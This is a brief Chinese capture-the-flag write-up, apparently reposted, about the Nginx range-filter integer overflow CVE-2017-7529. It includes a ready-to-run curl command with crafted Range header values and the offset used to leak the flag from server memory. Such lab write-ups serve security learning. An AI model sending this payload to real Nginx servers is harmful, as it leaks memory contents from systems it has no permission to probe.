Nginx整数溢出漏洞 Writeup - 码上快乐

相关内容简体繁体

Nginx整数溢出漏洞 Writeup

本文转载自查看原文 2021-08-14 23:34 141 CTF/ wp

Nginx整数溢出漏洞 CVE-2017-7529

题目URL：http://www.whalwl.site:8040/

漏洞描述

在 Nginx 的 range filter 中存在整数溢出漏洞，可以通过带有特殊构造的 range 的 HTTP 头的恶意请求引发这个整数溢出漏洞，并导致信息泄露。

扩展阅读
Nginx 整数溢出(CVE-2017-7529)漏洞分析
 CVE-2017-7529 poc

payload：
curl -i http://www.whalwl.site:8040/proxy/demo.png -r -17190,-9223372036854758618 > poc.txt
偏移 605可读取flag
17190=16585+605

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 暂停交易？ERC20合约整数溢出安全漏洞案例技术分析（一) 整数溢出实验 Java判断整数溢出 java int整数相乘溢出 Natas24 Writeup（strcmp绕过漏洞）初步认识栈溢出漏洞初级堆溢出-unlink漏洞 Linux Exploit系列之二整数溢出关于判断无符号整数相加溢出缓冲区溢出漏洞--原理

粤ICP备18138465号 © 2018-2025 CODEPRJ.COM